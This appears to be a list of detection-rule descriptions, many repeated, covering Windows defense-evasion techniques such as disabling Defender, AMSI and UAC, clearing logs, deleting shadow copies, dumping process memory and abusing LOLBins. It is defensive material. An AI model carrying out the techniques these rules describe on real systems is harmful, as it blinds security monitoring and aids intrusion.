Someone tries to hide from Sysmon
Potential threat actor tampering with Sysmon manifest and eventually disabling it
A General detection to trigger for the creation or modification of .*\Software\Sysinternals\SDelete registry keys. Indicators of the use of Sysinternals SDelete tool.
A General detection to trigger for the deletion of files by Sysinternals SDelete. It looks for the common name pattern used to rename files.
Detects SyncAppvPublishingServer process execution, which is usually utilized by adversaries to bypass PowerShell execution restrictions.
ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.
Detect VBoxDrvInst.exe run with parameters allowing processing INF file. This allows to create values in the registry and install drivers. For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys
Detects a usage of the manage-bde.wsf script that may indicate an attempt of proxy execution from script
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model
Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders. Both services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)
Detects a service binary running in a suspicious directory
Detects execution of powershell scripts via Runscripthelper.exe
Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity
setupapi.dll library provide InstallHinfSection function for processing INF files. INF file may contain instructions allowing to create values in the registry, modify files and install drivers. This technique could be used to obtain persistence via modifying one of Run or RunOnce registry keys, run process or use other DLLs chain calls (see references) InstallHinfSection function in setupapi.dll calls runonce.exe executable regardless of actual content of INF file.
Detects suspicious process related to rundll32 based on arguments
Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452
Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452
Detects the registration of a VSS/VDS Provider as a COM+ application.
Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.
Detects the PowerShell command lines with special characters
Detects the PowerShell command lines with reversed strings
Detects a suspicious parent of csc.exe, which could be a sign of payload delivery
Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory
Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection
Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
Detects the load of advapi31.dll by a process running in an uncommon folder
Open a handle on the drive volume via the \\.\ DOS device path specifier and perform a direct access read of the first few bytes of the volume.
Detects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks
Detects renamed ftp.exe, ftp.exe script execution and child processes run by ftp.exe
Detects clearing or configuration of event logs using wevtutil, powershell and wmic. Might be used by ransomware during an attack (seen with NotPetya and others).
Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance.
Detects the loading of drivers via ‘SeLoadDriverPrivilege’ required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code in to kernel mode. This user right does not apply to Plug and Play device drivers. If you exclude privileged users/admins and processes, which are allowed to do so, you are maybe left with bad programs trying to load malicious kernel drivers. This will detect Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs) and the usage of Sysinternals and various other tools. So you have to work with a whitelist to find the bad stuff.
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model
Detects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
Detects a suspicious copy command that copies a system program from System32 to another directory on disk - sometimes used to use LOLBINs like certutil or desktopimgdownldr to a different location with a different name
Detects suspicious use of calc.exe with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion
Threat actors can use auditpol binary to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
Atbroker executing non-default Assistive Technology applications
Detects suspect access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.
Detects suspicious .NET assembly executions. Could detect using Cobalt Strike’s command execute-assembly.
Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service
Detects extracting of zip file from image file
Detects appending of zip file to image
Detects possible use of the Squirrel package manager as a LOLBin
This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
Detects actions that clear the local ShimCache and remove forensic evidence
Shadow Copies deletion using operating systems utilities
Marks a file as a system file using the attrib.exe utility
Detects PowerShell script execution via input stream redirect
Detects PowerShell script execution from Alternate Data Stream (ADS)
This rule detects the execution of Run Once task as configured in the registry
Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
Detects suspicious renamed PAExec execution as often used by attackers
Detects the execution of a renamed meg.exe of MegaSync during incident response engagements associated with ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.
Detects renamed jusched.exe used by cobalt group
Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files
A general detection that triggers on processes removing .*\shell\open\command registry keys, which might have been used for COM hijacking activities.
Remove the AMSI Provider registry key in HKLM\Software\Microsoft\AMSI to disable AMSI inspection
Remote registry management using REG utility from non-admin workstation
Detects an attempt to execute code or create service on remote host via winrm.vbs.
Detects actions caused by the RedMimicry Winnti playbook
Detects actions caused by the RedMimicry Winnti playbook
Detects actions caused by the RedMimicry Winnti playbook
Detects uses of the rdrleakdiag.exe LOLBIN utility to dump process memory
Detects changes to RDP terminal service sensitive settings
Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form
Raw disk access using illegitimate tools, possible defence evasion
Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
Attackers can use explorer.exe for evading defense mechanisms
Detects process memory dump via comsvcs.dll and rundll32
Detects attackers attempting to disable Windows Defender using Powershell
Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.
Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
Detects suspicious encoded character syntax often used for defense evasion
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox
Detects when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
Detects requests to disable Microsoft Defender features using PowerShell commands
Detects base64 encoded PowerShell code that modifies Windows Defender
Detects PowerShell called from an executable by the version mismatch method
Detects possibly malicious, unauthorized usage of bcdedit.exe
Detects loading of samlib.dll or WinSCard.dll from an atypical process, e.g. through process hollowing by Mimikatz
Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.
Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)
Search for usage of reg or PowerShell by non-privileged users to modify service configuration in the registry
Detects netsh commands that open port 3389 used for RDP, as used by Sarwent malware
Detects netsh commands that configure a port forwarding of port 3389 used for RDP
Allow Incoming Connections by Port or Application on Windows Firewall
Detects netsh commands that configure a port forwarding (PortProxy)
Adversaries may modify system firewalls in order to bypass controls limiting network usage
Detects a suspicious child process of a mshta.exe process
Detects when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
Adversaries can abuse wuauclt.exe (Windows Update client) to execute code by specifying an arbitrary DLL.
Adversaries can abuse winget to download payloads remotely and execute them without touching disk. Winget will be included by default in Windows 10 and is already available in Windows 10 insider programs. The manifest option enables you to install an application by passing a YAML file directly to the client. Winget can be used to download and install exe, msi and msix files.
BITS allows you to schedule a command to execute after a successful download, to notify you that the job is finished. When the job runs on the system, the command specified in the BITS job is executed. This can be abused by actors to create a backdoor within the system and for persistence: a BITS job is chained to schedule the download of malware/additional binaries and execute the program after it has been downloaded
Detects the execution of regini.exe, which can be used to modify registry keys; the changes are imported from one or more text files.
Detects the import of an alternate data stream with regini.exe, which can be used to modify registry keys.
This rule detects a suspicious crash of the Microsoft Malware Protection Engine
Detects block of attempt to disable real time protection of Microsoft Defender by tamper protection
Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro
There is an option for the MS VS Just-In-Time Debugger “vsjitdebugger.exe” to launch a specified executable and attach a debugger. This option may be used by adversaries to execute malicious code via a signed, verified binary. The debugger is installed alongside the Microsoft Visual Studio package.
Detects the creation of a named pipe used by known APT malware
COM interface (EditionUpgradeManager) that is not used by standard executables.
Detects executables launched outside their default directories as used by Lazarus Group (Bluenoroff)
Detects obfuscated PowerShell via use of Rundll32 in scripts
Detects obfuscated PowerShell via use of Rundll32 in scripts
Detects obfuscated PowerShell via use of Rundll32 in scripts
Detects obfuscated PowerShell via use of MSHTA in scripts
Detects obfuscated PowerShell via use of MSHTA in scripts
Detects obfuscated PowerShell via use of MSHTA in scripts
Detects obfuscated PowerShell via use of Clip.exe in scripts
Detects obfuscated PowerShell via use of Clip.exe in scripts
Detects obfuscated PowerShell via use of Clip.exe in scripts
Detects obfuscated PowerShell via stdin in scripts
Detects obfuscated PowerShell via stdin in scripts
Detects obfuscated PowerShell via stdin in scripts
Detects obfuscated PowerShell via VAR++ LAUNCHER
Detects obfuscated PowerShell via VAR++ LAUNCHER
Detects obfuscated PowerShell via VAR++ LAUNCHER
Detects obfuscated use of environment variables to execute PowerShell
Detects obfuscated use of environment variables to execute PowerShell
Detects obfuscated use of environment variables to execute PowerShell
Detects obfuscated use of stdin to execute PowerShell
Detects obfuscated use of stdin to execute PowerShell
Detects obfuscated use of stdin to execute PowerShell
Detects obfuscated PowerShell via RUNDLL LAUNCHER
Detects obfuscated PowerShell via RUNDLL LAUNCHER
Detects obfuscated PowerShell via RUNDLL LAUNCHER
Detects obfuscated PowerShell via COMPRESS OBFUSCATION
Detects obfuscated PowerShell via COMPRESS OBFUSCATION
Detects obfuscated PowerShell via COMPRESS OBFUSCATION
Detects obfuscated use of Clip.exe to execute PowerShell
Detects obfuscated use of Clip.exe to execute PowerShell
Detects obfuscated use of Clip.exe to execute PowerShell
Detects installed new certificate
Executes an SCT script using scrobj.dll from a command entered into a specially prepared INF file.
Detect indirect command execution via Program Compatibility Assistant pcwrun.exe
Detects deletion of local audit logs
Detects the import of an alternate data stream to the registry with regedit.exe.
Detects the import of the specified file to the registry with regedit.exe.
Detects the image load of vss_ps.dll by uncommon executables using OriginalFileName datapoint
Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)
A general detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used in UAC bypass techniques.
Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option
Detects tools and process executions as observed in a Greenbug campaign in May 2020
Detects macOS Gatekeeper bypass via xattr utility
Detects suspicious parameters of fsutil (deleting the USN journal, configuring it with a small size, etc). Might be used by ransomware during an attack (seen with NotPetya and others).
Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs
Detects netsh commands that turn off the Windows firewall
Detects Archer malware invocation via rundll32
Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack
Detects file time attribute changes used to hide new files or changes to existing files.
Detects file time attribute changes used to hide new files or changes to existing files.
Detects file deletion commands
The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
Code integrity failures may indicate tampered executables.
F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
Exports the target Registry key and hides it in the specified alternate data stream.
Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module
Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module
Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module
Detects Execution via SyncInvoke in CL_Invocation.ps1 module
Detects Execution via SyncInvoke in CL_Invocation.ps1 module
Detects Execution via SyncInvoke in CL_Invocation.ps1 module
Checks whether the image specified in a process creation event doesn’t refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)
This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection
Detects code execution via Pester.bat (Pester - PowerShell module for testing)
Detects the creation of an ADS data stream that contains an executable (non-empty imphash)
Detects specific combinations of encoding methods in the PowerShell command lines
This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.
Detects suspicious empty user agent strings in proxy logs
Detects some Empire PowerShell UAC bypass methods
Detects EmpireMonkey APT reported Activity
Detects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution
Detects the use of the filename DumpStack.log to evade Microsoft Defender
Detects download of certain file types from hosts with dynamic DNS names (selected list)
Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required)
This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded
Detects Dllhost that communicates with public IP addresses
This rule detects DLL injection and execution via LOLBAS - Tracker.exe
Detects using register-cimprovider.exe to execute arbitrary dll file.
Detects use of Rasautou.exe to load an arbitrary DLL specified with the -d option and execute the export specified with -p.
Detects commands that temporarily turn off Volume Snapshots
Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)
Disable User Account Control (UAC) by changing its registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0
Detects disabling Windows Defender Tamper Protection
Detects disabling security tools
Detects disabling Windows Defender PUA protection
Detects command that is used to disable or delete Windows eventlog via logman Windows utility
Disable Microsoft Office Security Features by registry
Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage
Detects disabling Windows Defender Exploit Guard Network Protection
This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications. HxTsr.exe is part of the Outlook apps and resides in a hidden “WindowsApps” subfolder of “C:\Program Files”. Its path includes a version number, e.g., “C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\HxTsr.exe”. Any instance of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.
Detects usage of base64 utility to decode arbitrary base64-encoded text
Detects usage of base64 utility to decode arbitrary base64-encoded text
Detects the execution of the Xwizard tool with specific arguments that are utilized to run custom class properties.
Detects uses of the createdump.exe LOLBIN utility to dump process memory
The CrackMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
Detects suspicious command lines used in Covenant launchers
Potential adversaries stopping ETW providers recording loaded .NET assemblies.
Potential adversaries stopping ETW providers recording loaded .NET assemblies.
Potential adversaries stopping ETW providers recording loaded .NET assemblies.
Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.
Detects the creation of a named pipe as used by CobaltStrike
Detects Malleable Amazon Profile
Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike
Rundll32 can be used by Cobalt Strike with the StartW function to load DLLs from the command line.
Detects a typical pattern of a Cobalt Strike BOF that injects into other processes
Detects the redirection of an output stream of / within a Windows command line session
Detects clear logs
Detects a suspicious certutil command used to encode files, which is sometimes used for data exfiltration
Detects remote thread creation from CACTUSTORCH as described in references.
There is an auto-elevated task called SilentCleanup located in %windir%\system32\cleanmgr.exe. This can be abused to elevate any file with Administrator privileges without prompting UAC
Bypasses User Account Control using a fileless method
Detects Bitsadmin connections to domains with uncommon TLDs - https://twitter.com/jhencinski/status/1102695118455349248 - https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/
Detects usage of bitsadmin downloading a file
Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects use of dd and truncate to add junk data to a file.
Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects use of dd and truncate to add junk data to a file.
Detects base64 encoded .NET reflective loading of Assembly
Detects base64 encoded listing Win32_Shadowcopy
Identifies when a service principal was removed in Azure.
Identifies when a service principal is created in Azure.
Identifies when an owner was removed from an application or service principal in Azure.
Identifies when an application is deleted in Azure.
Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)
Detects creation/modification of Assistive Technology applications and persistence through usage of ATs
Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.
Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.
Attackers can use print.exe for remote file copy
Attackers can use findstr to hide their artifacts or search for specific strings and evade defense mechanisms